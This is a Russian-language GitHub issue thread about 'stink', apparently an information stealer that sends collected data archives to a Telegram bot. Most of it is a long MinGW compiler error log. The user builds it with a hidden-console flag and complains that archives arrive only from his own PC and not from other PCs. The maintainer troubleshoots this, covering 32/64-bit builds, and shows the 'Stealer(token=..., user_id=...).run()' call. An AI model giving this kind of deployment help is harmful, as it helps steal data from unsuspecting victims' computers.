### ISSUE TITLE
не работает нуитка

### ISSUE THREAD

**Issue by raskolgetup** [FallenAstaroth/stink#23]
![image](https://user-images.githubusercontent.com/101987134/159172313-01592bc4-4b5f-4f20-9ced-373f9ca6b134.png)
не компилируется файл
пробовал через pyinstaller, всё создалось но оно собирает данные почему-то только с моего ПК

**Comment by FallenAstaroth** [comment]
> 

Обычно эта проблема решается переименованием / пересозданием файла. Что конкретно имеется ввиду под "собирает данные почему-то только с моего ПК"? Не приходит архив на других устройствах, получаете ошибку при запуске или что-то другое?

**Comment by raskolgetup** [comment]
да, в бота не приходит архив с данными с других устройств

**Comment by FallenAstaroth** [comment]
> да, в бота не приходит архив с данными с других устройств

Возможно дело в Pyinstaller. Он только упаковывает файлы в архив под видом exe файла, Nuitka же полноценно конвертирует код в C / C++ и затем компилирует. Так же возможно у вас ПК имеет 64 разрядную систему, а второй ПК 32 разрядную. Если на 64 битной системе еще можно запустить 32 битный файл, то наоборот этот трюк не сработает, под 32 разрядную систему нужна отдельная компиляция.

Попробуйте скомпилировать еще раз после переименования / пересоздания файла test.py. Без кода ошибки можно долго гадать в чем дело.

**Comment by raskolgetup** [comment]
![image](https://user-images.githubusercontent.com/101987134/159179604-e40a9755-7ee2-4c0a-8ba9-b5625dba673d.png)
вылезает такое при компиляции
там ещё дальше много текста, если надо, могу скинуть

**Comment by FallenAstaroth** [comment]
> ![image](https://user-images.githubusercontent.com/101987134/159179604-e40a9755-7ee2-4c0a-8ba9-b5625dba673d.png) вылезает такое при компиляции там ещё дальше много текста, если надо, могу скинуть

Надо и желательно текстом

**Comment by raskolgetup** [comment]
(venv) C:\Users\artem\Desktop\stink>nuitka --onefile --windows-disable-console --include-package=stink test.py
Nuitka-Options:INFO: Used command line options: --onefile --windows-disable-console --include-package=stink test.py
Nuitka:INFO: Starting Python compilation with Nuitka '0.6.16.4' on Python '3.7' commercial None.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'socket' added '_socket'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'urllib3' added 'urllib3._collections,urllib3.connection,urllib3.connectionpool,urllib3.contrib,urllib3.contrib.appengine,urllib3.exceptions,urllib3.fields,urllib3.filepost,urllib3.packages,urllib3.packages.six,urllib3.packages.ssl_match_hostname,urllib3.poolmanager,urllib3.request,urllib3.response,urllib3.util,urllib3.util.connection,urllib3.util.queue,urllib3.util.request,urllib3.util.response,urllib3.util.retry,urllib3.util.ssl_,urllib3.util.timeout,urllib3.util.url,urllib3.util.wait,urllib.error,urllib.parse,urllib.request,urllib.response'.
Nuitka-Plugins:WARNING: Use '--plugin-enable=pylint-warnings' for: Understand PyLint/PyDev annotations for warnings.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'ctypes' added '_ctypes'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Util._cpu_features' added 'Crypto.Util._cpuid_c'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Util._raw_api' added 'Crypto.Cipher._raw_aes,Crypto.Cipher._raw_aesni,Crypto.Cipher._raw_arc2,Crypto.Cipher._raw_blowfish,Crypto.Cipher._raw_cast,Crypto.Cipher._raw_cbc,Crypto.Cipher._raw_cfb,Crypto.Cipher._raw_ctr,Crypto.Cipher._raw_des,Crypto.Cipher._raw_des3,Crypto.Cipher._raw_ecb,Crypto.Cipher._raw_ocb,Crypto.Cipher._raw_ofb'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Hash.BLAKE2s' added 'Crypto.Hash._BLAKE2s'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Util.strxor' added 'Crypto.Util._strxor'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Cipher._mode_gcm' added 'Crypto.Hash._ghash_portable'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Protocol.KDF' added 'Crypto.Cipher._Salsa20,Crypto.Protocol._scrypt'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Hash.MD5' added 'Crypto.Hash._MD5'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Hash.SHA256' added 'Crypto.Hash._SHA256'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'Crypto.Hash.SHA1' added 'Crypto.Hash._SHA1'.
Nuitka-Plugins:INFO: implicit-imports: Implicit dependencies of module 'tkinter' added '_tkinter'.
                                                                                                       Nuitka:INFO: Completed Python level compilation and optimization.
Nuitka:INFO: Generating source code for C backend compiler.
Nuitka:INFO: Running data composer tool for optimal constant value handling.
Nuitka:INFO: Running C level backend compilation via Scons.
Nuitka-Scons:INFO: Backend C compiler: gcc (gcc).
In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,
                 from c:\mingw\include\sys\types.h:174,
                 from c:\mingw\include\io.h:56,
                 from D:\python 3.7\include/pyconfig.h:59,
                 from D:\python 3.7\include/Python.h:8,
                 from __loader.c:4:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from __loader.c:4:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
D:\python 3.7\include/pytime.h:135:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  135 |     struct timeval *tv,
      |            ^~~~~~~

In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,
                 from c:\mingw\include\sys\types.h:174,
                 from c:\mingw\include\io.h:56,
                 from D:\python 3.7\include/pyconfig.h:59,
                 from D:\python 3.7\include/Python.h:8,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from __constants.c:2:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from __constants.c:2:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
D:\python 3.7\include/pytime.h:135:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  135 |     struct timeval *tv,
      |            ^~~~~~~                                                                             In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,                          | 4/121
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,
                 from c:\mingw\include\sys\types.h:174,
                 from c:\mingw\include\io.h:56,
                 from D:\python 3.7\include/pyconfig.h:59,
                 from D:\python 3.7\include/Python.h:8,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from __helpers.c:4:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from __helpers.c:4:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
D:\python 3.7\include/pytime.h:135:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  135 |     struct timeval *tv,
      |            ^~~~~~~
                                                                                                       scons: *** [__loader.o] Error 1                                                                  | 4/121
In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,
                 from c:\mingw\include\sys\types.h:174,
                 from c:\mingw\include\io.h:56,
                 from D:\python 3.7\include/pyconfig.h:59,
                 from D:\python 3.7\include/Python.h:8,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._mode_cbc.c:19:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._mode_cbc.c:19:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
D:\python 3.7\include/pytime.h:135:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  135 |     struct timeval *tv,
      |            ^~~~~~~


Backend C:   3%|██▋                                                                             | 4/121
scons: *** [__constants.o] Error 1                                                              | 4/121scons: *** [module.Crypto.Cipher._mode_cbc.o] Error 1                                            | 4/121
  3%|███                                                                                        | 4/121s
cons: *** [__helpers.o] Error 1
Backend C:   3%|██▋                                                                             | 4/121

In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,
                 from c:\mingw\include\sys\types.h:174,
                 from c:\mingw\include\io.h:56,
                 from D:\python 3.7\include/pyconfig.h:59,
                 from D:\python 3.7\include/Python.h:8,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._EKSBlowfish.c:19:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._EKSBlowfish.c:19:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,ed inside parameter list will not
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,
                 from c:\mingw\include\sys\types.h:174,
                 from c:\mingw\include\io.h:56,
                 from D:\python 3.7\include/pyconfig.h:59,
                 from D:\python 3.7\include/Python.h:8,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher.AES.c:19:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher.AES.c:19:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
D:\python 3.7\include/pytime.h:135:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  135 |     struct timeval *tv,
      |            ^~~~~~~

                                                                                                       scons: *** [module.Crypto.Cipher.AES.o] Error 1
In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,            | 6/121
                 from c:\mingw\include\sys\types.h:174,1
                 from c:\mingw\include\io.h:56,                                                 | 6/121
                 from D:\python 3.7\include/pyconfig.h:59,
                 from D:\python 3.7\include/Python.h:8,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._mode_cfb.c:19:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._mode_cfb.c:19:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
D:\python 3.7\include/pytime.h:135:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  135 |     struct timeval *tv,
      |            ^~~~~~~
                                                                                                       scons: *** [module.Crypto.Cipher._mode_cfb.o] Error 1
In file included from c:\mingw\x86_64-w64-mingw32\include\crtdefs.h:10,
                 from c:\mingw\x86_64-w64-mingw32\include\stddef.h:7,
                 from c:\mingw\lib\gcc\x86_64-w64-mingw32\10.2.0\include\stddef.h:1,
                 from c:\mingw\include\sys\types.h:174,
                 from c:\mingw\include\io.h:56,
                 from D:\python 3.7\include/pyconfig.h:59,                                      | 7/121
                 from D:\python 3.7\include/Python.h:8,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._mode_ccm.c:19:
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:40:18: error: expected ';' before 'typedef'
   40 | __MINGW_EXTENSION typedef unsigned __int64 size_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:18: error: expected ';' before 'typedef'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:50:35: error: conflicting types for 'ssize_t'
   50 | __MINGW_EXTENSION typedef __int64 ssize_t;
      |                                   ^~~~~~~
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:67:18: error: expected ';' before 'typedef'
   67 | __MINGW_EXTENSION typedef __int64 intptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:80:18: error: expected ';' before 'typedef'
   80 | __MINGW_EXTENSION typedef unsigned __int64 uintptr_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:93:18: error: expected ';' before 'typedef'
   93 | __MINGW_EXTENSION typedef __int64 ptrdiff_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:128:18: error: expected ';' before 'typedef'
  128 | __MINGW_EXTENSION typedef __int64 __time64_t;
      |                  ^~~~~~~~
      |                  ;
c:\mingw\x86_64-w64-mingw32\include\corecrt.h:143:20: error: conflicting types for 'time_t'
  143 | typedef __time64_t time_t;
      |                    ^~~~~~
In file included from D:\python 3.7\include/Python.h:87,
                 from C:\Users\artem\Desktop\stink\venv\lib\SITE-P~1\nuitka\build\include/nuitka/prelude.h:47,
                 from module.Crypto.Cipher._mode_ccm.c:19:
D:\python 3.7\include/pytime.h:123:59: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  123 | PyAPI_FUNC(int) _PyTime_FromTimeval(_PyTime_t *tp, struct timeval *tv);
      |                                                           ^~~~~~~
D:\python 3.7\include/pytime.h:130:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  130 |     struct timeval *tv,
      |            ^~~~~~~
D:\python 3.7\include/pytime.h:135:12: warning: 'struct timeval' declared inside parameter list will not be visible outside of this definition or declaration
  135 |     struct timeval *tv,
      |            ^~~~~~~
                                                                                                       scons: *** [module.Crypto.Cipher._mode_ccm.o] Error 1

**Comment by raskolgetup** [comment]
всё, проблема с компиляцией решилась, но бот не присылает мне архивы с других пк, только с моего
на других ПК 64 битная система как и на моём

**Comment by FallenAstaroth** [comment]
> всё, проблема с компиляцией решилась, но бот не присылает мне архивы с других пк, только с моего на других ПК 64 битная система как и на моём

Скомпилируйте файл с включенным выводом ошибок. Для этого нужно добавить соответствующий параметр при вызове:
`Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, errors=True).run()`
Не забудьте убрать `--windows-disable-console` в команде компиляции. После этого запустите файл через консоль на ПК, с которым возникли проблемы и скиньте ошибку.

**Comment by liloko** [comment]
> всё, проблема с компиляцией решилась, но бот не присылает мне архивы с других пк, только с моего на других ПК 64 битная система как и на моём

а как кст решить проблему то?
